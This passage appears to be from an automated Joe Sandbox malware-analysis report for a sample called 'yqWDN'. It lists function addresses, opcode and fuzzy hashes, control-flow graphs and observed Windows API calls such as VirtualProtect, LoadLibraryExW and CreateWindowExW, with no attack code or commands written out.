                                                                          • Instruction Fuzzy Hash: E52167B1514208DFDB41DF94C8C0B26BB61FB84364F24C66CED098B243C376D846CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0125D01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 338d00a139269223b87b01db5f8515abd181e1bf789737f1b9ba59869026a974
                                                                          • Instruction ID: b32d6b23d6370963d1b907a25c17393581eb90dba58f3fd19b79205c013f0365
                                                                          • Opcode Fuzzy Hash: 338d00a139269223b87b01db5f8515abd181e1bf789737f1b9ba59869026a974
                                                                          • Instruction Fuzzy Hash: E82134B1518248DFDB51DF64D8C0B26BB65FB84364F24C96DED0A4B246C37AD807CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0125D006 Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64e40a8304ca229ffaae2799fa91f198b403f04802d0bdfdb65cf2a3d05c4c9b
                                                                          • Instruction ID: d5218278ebc8eba2255116d70009b8378539f6260395172e1bdb39f743700cdc
                                                                          • Opcode Fuzzy Hash: 64e40a8304ca229ffaae2799fa91f198b403f04802d0bdfdb65cf2a3d05c4c9b
                                                                          • Instruction Fuzzy Hash: D7219D755093848FDB02CF24D9D0B15BF71EB46314F28C5EAD9498B6A7C33AD84ACB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0113D49B Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4244a9aae6d80b52576d8183ab5a55eec2a15cebe5e8ad83433696fc3d306fb5
                                                                          • Instruction ID: f1840641aeb3c9885e074650c42b9f9589bd032da5eee4fc0e5021a25f2c98d8
                                                                          • Opcode Fuzzy Hash: 4244a9aae6d80b52576d8183ab5a55eec2a15cebe5e8ad83433696fc3d306fb5
                                                                          • Instruction Fuzzy Hash: 9311B176904280CFDF16CF54E5C4B16BF72FB84324F2486A9D9054B65BC336D45ACBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0125D1CF Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc7e01eeaf6b7fcf3c612de606988f7e81d04e4c628bf39ec0a86da91ad33e64
                                                                          • Instruction ID: fcb516011f13a8a349d7b7b3fb521a8b3868e4d395c09e17e81a48d1c325cec5
                                                                          • Opcode Fuzzy Hash: dc7e01eeaf6b7fcf3c612de606988f7e81d04e4c628bf39ec0a86da91ad33e64
                                                                          • Instruction Fuzzy Hash: 7411BB75904284DFDB42CF54D5C0B15BBB1FB84224F28C6ADDD498B657C33AD44ACB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0113D745 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 866cc1be59bd30b3d70f3238087c26eccb5294c84b3534f8c624d9b11dd54fd4
                                                                          • Instruction ID: cdc94896ea4c1994b7897de353ca777069ae00af179905d1b0d2aabcfa231021
                                                                          • Opcode Fuzzy Hash: 866cc1be59bd30b3d70f3238087c26eccb5294c84b3534f8c624d9b11dd54fd4
                                                                          • Instruction Fuzzy Hash: F9014C714087D09AEB165B95DC84766BB98EF8127CF09C519EE094B24BC3349804C672
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0113D744 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 182157e552f12fe80c67616068fdc1ccd8e02f02a2505145dbdecea3f17d4f38
                                                                          • Instruction ID: 975f64504d1d255b85d41fce8e5fd6c774ebc9b8df5bc276f6e9459cedf036fc
                                                                          • Opcode Fuzzy Hash: 182157e552f12fe80c67616068fdc1ccd8e02f02a2505145dbdecea3f17d4f38
                                                                          • Instruction Fuzzy Hash: 19F0C2714046849EFB158E59DC84B62FF98EB81678F18C05AEE084B28BC3789848CAB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:10.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:105
                                                                          Total number of Limit Nodes:6
                                                                          execution_graph 17097 719bd58 17098 719bda0 VirtualProtect 17097->17098 17099 719bdda 17098->17099 17192 12c9998 17193 12c99da 17192->17193 17194 12c99e0 LoadLibraryExW 17192->17194 17193->17194 17195 12c9a11 17194->17195 17100 12cbb60 DuplicateHandle 17101 12cbbf6 17100->17101 17102 12c6260 17105 12c5344 17102->17105 17104 12c626d 17106 12c534f 17105->17106 17109 12c5394 17106->17109 17108 12c6345 17108->17104 17110 12c539f 17109->17110 17113 12c53c4 17110->17113 17112 12c682a 17112->17108 17114 12c53cf 17113->17114 17117 12c63e0 17114->17117 17116 12c6922 17116->17112 17118 12c63eb 17117->17118 17119 12c707c 17118->17119 17121 12cb150 17118->17121 17119->17116 17123 12cb181 17121->17123 17122 12cb1a5 17122->17119 17123->17122 17126 12cb408 17123->17126 17130 12cb418 17123->17130 17127 12cb425 17126->17127 17128 12cb45f 17127->17128 17134 12c9480 17127->17134 17128->17122 17131 12cb425 17130->17131 17132 12cb45f 17131->17132 17133 12c9480 3 API calls 17131->17133 17132->17122 17133->17132 17136 12c948b 17134->17136 17135 12cc158 17136->17135 17138 12cb7a4 17136->17138 17139 12cb7af 17138->17139 17140 12c63e0 3 API calls 17139->17140 17141 12cc1c7 17139->17141 17140->17141 17145 12cdf38 17141->17145 17153 12cdf50 17141->17153 17142 12cc200 17142->17135 17146 12cdf8d 17145->17146 17147 12cdf42 17145->17147 17146->17142 17147->17146 17162 12ce289 17147->17162 17165 12ce298 17147->17165 17148 12cdfce 17148->17146 17168 12cec60 17148->17168 17180 12cec4f 17148->17180 17155 12ce073 17153->17155 17156 12cdf81 17153->17156 17154 12cdf8d 17154->17142 17155->17142 17156->17154 17160 12ce298 2 API calls 17156->17160 17161 12ce289 2 API calls 17156->17161 17157 12cdfce 17157->17155 17158 12cec4f 2 API calls 17157->17158 17159 12cec60 2 API calls 17157->17159 17158->17155 17159->17155 17160->17157 17161->17157 17163 12c9530 GetModuleHandleW GetModuleHandleW 17162->17163 17164 12ce2a1 17163->17164 17164->17148 17166 12c9530 GetModuleHandleW GetModuleHandleW 17165->17166 17167 12ce2a1 17165->17167 17166->17167 17167->17148 17169 12cec8a 17168->17169 17170 12cd784 GetModuleHandleW 17169->17170 17171 12cecec 17170->17171 17176 12cf0b8 GetModuleHandleW 17171->17176 17177 12cd784 GetModuleHandleW 17171->17177 17178 12cf150 GetModuleHandleW 17171->17178 17172 12ced08 17173 12c911c GetModuleHandleW 17172->17173 17175 12ced31 17172->17175 17174 12ced5b 17173->17174 17179 12cf921 CreateWindowExW 17174->17179 17176->17172 17177->17172 17178->17172 17179->17175 17181 12cec8a 17180->17181 17182 12cd784 GetModuleHandleW 17181->17182 17183 12cecec 17182->17183 17188 12cf0b8 GetModuleHandleW 17183->17188 17189 12cd784 GetModuleHandleW 17183->17189 17190 12cf150 GetModuleHandleW 17183->17190 17184 12ced08 17185 12c911c GetModuleHandleW 17184->17185 17187 12ced31 17184->17187 17186 12ced5b 17185->17186 17191 12cf921 CreateWindowExW 17186->17191 17188->17184 17189->17184 17190->17184 17191->17187 17196 12c9030 17199 12c9530 17196->17199 17197 12c903f 17207 12c911c 17199->17207 17202 12c955b 17202->17197 17203 12c9553 17203->17202 17204 12c9758 GetModuleHandleW 17203->17204 17205 12c9785 17204->17205 17205->17197 17208 12c9710 GetModuleHandleW 17207->17208 17210 12c9543 17208->17210 17210->17202 17211 12c97a8 17210->17211 17212 12c911c GetModuleHandleW 17211->17212 17213 12c97cc 17212->17213 17213->17203 17214 12cb530 GetCurrentProcess 17215 12cb5aa GetCurrentThread 17214->17215 17216 12cb5a3 17214->17216 17217 12cb5e7 GetCurrentProcess 17215->17217 17218 12cb5e0 17215->17218 17216->17215 17221 12cb61d 17217->17221 17218->17217 17219 12cb645 GetCurrentThreadId 17220 12cb676 17219->17220 17221->17219

                                                                          Executed Functions

                                                                          Function 012CB521 Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB590
                                                                          • GetCurrentThread.KERNEL32 ref: 012CB5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 012CB663
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: d658a32a7ee45c92482569ae4ec6cea41d9b8b47fb32d32d461795dc524e6799
                                                                          • Instruction ID: 6037e370f5852a272cdb796641cbb06746c2f479f93baafcf4b61518cdf7f55f
                                                                          • Opcode Fuzzy Hash: d658a32a7ee45c92482569ae4ec6cea41d9b8b47fb32d32d461795dc524e6799
                                                                          • Instruction Fuzzy Hash: 1F5163B0D006498FDB14CFAAD589BEEBBF0EF98354F248599E149A3390D7349948CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012CB530 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 105 12cb530-12cb5a1 GetCurrentProcess 106 12cb5aa-12cb5de GetCurrentThread 105->106 107 12cb5a3-12cb5a9 105->107 108 12cb5e7-12cb61b GetCurrentProcess 106->108 109 12cb5e0-12cb5e6 106->109 107->106 111 12cb61d-12cb623 108->111 112 12cb624-12cb63c 108->112 109->108 111->112 123 12cb63f call 12cbed8 112->123 124 12cb63f call 12cb6e0 112->124 125 12cb63f call 12cbed0 112->125 114 12cb645-12cb674 GetCurrentThreadId 116 12cb67d-12cb6df 114->116 117 12cb676-12cb67c 114->117 117->116 123->114 124->114 125->114
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB590
                                                                          • GetCurrentThread.KERNEL32 ref: 012CB5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 012CB663
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: b3f01a9234fe5d58786455acd3cfdde8754d9d6dc073f582e5b977d7be59c91a
                                                                          • Instruction ID: a14d9c872793b80327871c66d3e04512b9c4a9f96b05c4625c76e922e6532afc
                                                                          • Opcode Fuzzy Hash: b3f01a9234fe5d58786455acd3cfdde8754d9d6dc073f582e5b977d7be59c91a
                                                                          • Instruction Fuzzy Hash: 525164B0D006498FDB14CFAAD548BDEBBF0EF88354F248599E149A7350D734A948CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012CF921 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 126 12cf921-12cf9f8 127 12cfa5a-12cfabe 126->127 128 12cf9fa-12cfa38 call 12cd834 126->128 129 12cfac9-12cfad0 127->129 130 12cfac0-12cfac6 127->130 132 12cfa3d-12cfa3e 128->132 133 12cfadb-12cfb7a CreateWindowExW 129->133 134 12cfad2-12cfad8 129->134 130->129 136 12cfb7c-12cfb82 133->136 137 12cfb83-12cfbbb 133->137 134->133 136->137 141 12cfbbd-12cfbc0 137->141 142 12cfbc8 137->142 141->142 143 12cfbc9 142->143 143->143
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012CFB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 8457ddc383a566d46dd4f83c75f4e000b72f6de36b5b49999f333911fa769cd3
                                                                          • Instruction ID: bf8057648df689adbed87ad6808566402d03719aaacc45c018e08725b87123f8
                                                                          • Opcode Fuzzy Hash: 8457ddc383a566d46dd4f83c75f4e000b72f6de36b5b49999f333911fa769cd3
                                                                          • Instruction Fuzzy Hash: EA8183B2C043889FDF02CFA5C8946DDBFB1AF59314F19819AE944AB262D3348846CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012C9530 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 144 12c9530-12c9545 call 12c911c 147 12c955b-12c955f 144->147 148 12c9547-12c9555 call 12c97a8 144->148 149 12c9561-12c956b 147->149 150 12c9573-12c95b4 147->150 148->147 153 12c9690-12c9750 148->153 149->150 155 12c95b6-12c95be 150->155 156 12c95c1-12c95cf 150->156 192 12c9758-12c9783 GetModuleHandleW 153->192 193 12c9752-12c9755 153->193 155->156 158 12c95d1-12c95d6 156->158 159 12c95f3-12c95f5 156->159 160 12c95d8-12c95df call 12c9128 158->160 161 12c95e1 158->161 162 12c95f8-12c95ff 159->162 165 12c95e3-12c95f1 160->165 161->165 166 12c960c-12c9613 162->166 167 12c9601-12c9609 162->167 165->162 169 12c9615-12c961d 166->169 170 12c9620-12c9629 call 12c9138 166->170 167->166 169->170 174 12c962b-12c9633 170->174 175 12c9636-12c963b 170->175 174->175 177 12c963d-12c9644 175->177 178 12c9659-12c965d 175->178 177->178 179 12c9646-12c9656 call 12c9148 call 12c9158 177->179 198 12c9660 call 12c9ac0 178->198 199 12c9660 call 12c9a91 178->199 179->178 182 12c9663-12c9666 185 12c9668-12c9686 182->185 186 12c9689-12c968f 182->186 185->186 194 12c978c-12c97a0 192->194 195 12c9785-12c978b 192->195 193->192 195->194 198->182 199->182
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: ce39a163636d3d4a20e55a7f3ace9969d48b3d1df51f8812dacde4f3d4875ac9
                                                                          • Instruction ID: ec535d929be4fd7238f7e745a3161fb6463a838f0b77ddac0a57d36336b9d836
                                                                          • Opcode Fuzzy Hash: ce39a163636d3d4a20e55a7f3ace9969d48b3d1df51f8812dacde4f3d4875ac9
                                                                          • Instruction Fuzzy Hash: 22714470A10B058FDB24DF2AD04579ABBF1FF88708F108A2DD69AD7A40DB75E845CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012CFA4D Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 200 12cfa4d-12cfabe 202 12cfac9-12cfad0 200->202 203 12cfac0-12cfac6 200->203 204 12cfadb-12cfb13 202->204 205 12cfad2-12cfad8 202->205 203->202 206 12cfb1b-12cfb7a CreateWindowExW 204->206 205->204 207 12cfb7c-12cfb82 206->207 208 12cfb83-12cfbbb 206->208 207->208 212 12cfbbd-12cfbc0 208->212 213 12cfbc8 208->213 212->213 214 12cfbc9 213->214 214->214
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012CFB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 1b870cd3a0fc51e46f21f62b7f03ef51f9e9cd3bed533ac8b4e99418287b46b1
                                                                          • Instruction ID: ffc153cf795a7d9d86482b076c8e03b76d789c9475ae3b0945e3bef054e88ac3
                                                                          • Opcode Fuzzy Hash: 1b870cd3a0fc51e46f21f62b7f03ef51f9e9cd3bed533ac8b4e99418287b46b1
                                                                          • Instruction Fuzzy Hash: 5E51C2B1D103499FDB14CFA9C994ADEBFB1BF88314F24822EE515AB210D7749845CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012CFA58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 215 12cfa58-12cfabe 216 12cfac9-12cfad0 215->216 217 12cfac0-12cfac6 215->217 218 12cfadb-12cfb13 216->218 219 12cfad2-12cfad8 216->219 217->216 220 12cfb1b-12cfb7a CreateWindowExW 218->220 219->218 221 12cfb7c-12cfb82 220->221 222 12cfb83-12cfbbb 220->222 221->222 226 12cfbbd-12cfbc0 222->226 227 12cfbc8 222->227 226->227 228 12cfbc9 227->228 228->228
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012CFB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: e4c9448ba689358fa6122dea7493194515038f9656a28ebe980622f49cb91529
                                                                          • Instruction ID: 8cf5cc408105faf096adda9bff767d41cb8c64227f199bce2ac6e82ec0920d33
                                                                          • Opcode Fuzzy Hash: e4c9448ba689358fa6122dea7493194515038f9656a28ebe980622f49cb91529
                                                                          • Instruction Fuzzy Hash: 6F41C1B1D103099FDB14CFAAC984ADEBBB5FF88714F24822EE519AB210D7749845CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012CBB58 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 229 12cbb58-12cbbf4 DuplicateHandle 230 12cbbfd-12cbc1a 229->230 231 12cbbf6-12cbbfc 229->231 231->230
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CBBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 3fc3653d768d06653fb81e762a016c55813d8b477a875f69b39e6562d79b8c90
                                                                          • Instruction ID: 58f5435266fe5065d74655f0ab80592d4bbe22e3799443f9296f3f41f64728f6
                                                                          • Opcode Fuzzy Hash: 3fc3653d768d06653fb81e762a016c55813d8b477a875f69b39e6562d79b8c90
                                                                          • Instruction Fuzzy Hash: 3D21E6B5D002599FDB10CFAAD485ADEFFF5EB58320F15801AE954A3310D3749945CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012CBB60 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 234 12cbb60-12cbbf4 DuplicateHandle 235 12cbbfd-12cbc1a 234->235 236 12cbbf6-12cbbfc 234->236 236->235
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CBBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 1d354fbed003ed9b54cba88dc19618bd829dcdc0aaf9d2f126c8dba4cc83944c
                                                                          • Instruction ID: f39ea6ec5198e6df02ab5c761bb3466cf3794739980a829b37922e277ed2b1bf
                                                                          • Opcode Fuzzy Hash: 1d354fbed003ed9b54cba88dc19618bd829dcdc0aaf9d2f126c8dba4cc83944c
                                                                          • Instruction Fuzzy Hash: 5B21D3B5D002599FDB10CFAAD985ADEFBF8FB48324F14841AE954A3310D374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0719BD58 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 239 719bd58-719bdd8 VirtualProtect 241 719bdda-719bde0 239->241 242 719bde1-719be02 239->242 241->242
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719BDCB
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.377826386.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7190000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0916d993a453c6c7728649182caec29eb7ba89025a31db8aa694be549d616c4b
                                                                          • Instruction ID: 48b80cf0d626da07b8739af2f5e18bb9877915d34b217a1068be1f06e9ab5d6d
                                                                          • Opcode Fuzzy Hash: 0916d993a453c6c7728649182caec29eb7ba89025a31db8aa694be549d616c4b
                                                                          • Instruction Fuzzy Hash: 3B2103B19002499FCB10CF9AD884BDEBBF4EB48324F10842AE458A7240D378A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012C9990 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 244 12c9990-12c99d8 245 12c99da-12c99dd 244->245 246 12c99e0-12c9a0f LoadLibraryExW 244->246 245->246 247 12c9a18-12c9a35 246->247 248 12c9a11-12c9a17 246->248 248->247
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 012C9A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: ed8bc4126abebbc62805812f9db2a4b841961993a9bb12b8ca707b4474cc4549
                                                                          • Instruction ID: f3b73589e58b1a6662875b3341f27472ac2386ae4c44004ad442f0bfc6e8e507
                                                                          • Opcode Fuzzy Hash: ed8bc4126abebbc62805812f9db2a4b841961993a9bb12b8ca707b4474cc4549
                                                                          • Instruction Fuzzy Hash: 111103B69002498FDB10CFAAD484ADEFBF4AF88314F14856EE555A7200C374A549CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012C9998 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 251 12c9998-12c99d8 252 12c99da-12c99dd 251->252 253 12c99e0-12c9a0f LoadLibraryExW 251->253 252->253 254 12c9a18-12c9a35 253->254 255 12c9a11-12c9a17 253->255 255->254
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 012C9A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 7f5d57ee5c0296800bfe92a1bfd17b974f82c3016fb13c117d35c7cf1b8aab89
                                                                          • Instruction ID: 138f9965b5657b5045d4cfd1a77fea0ce456a6c34a53a0aaa4275e73870452f0
                                                                          • Opcode Fuzzy Hash: 7f5d57ee5c0296800bfe92a1bfd17b974f82c3016fb13c117d35c7cf1b8aab89
                                                                          • Instruction Fuzzy Hash: 1F1123B6D002498FDF10CFAAC844ADEFBF8EB88324F14852EE515A7200C374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 012C911C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 258 12c911c-12c9750 260 12c9758-12c9783 GetModuleHandleW 258->260 261 12c9752-12c9755 258->261 262 12c978c-12c97a0 260->262 263 12c9785-12c978b 260->263 261->260 263->262
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,012C9543), ref: 012C9776
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: f518be2ec91a7c6752d68483242a9debba4919cffedb56d2ec4127bf6693e2d2
                                                                          • Instruction ID: d9bd922503387dc642bd7d860f1f754c24570860d68ed907fe47d3505f4ebb0d
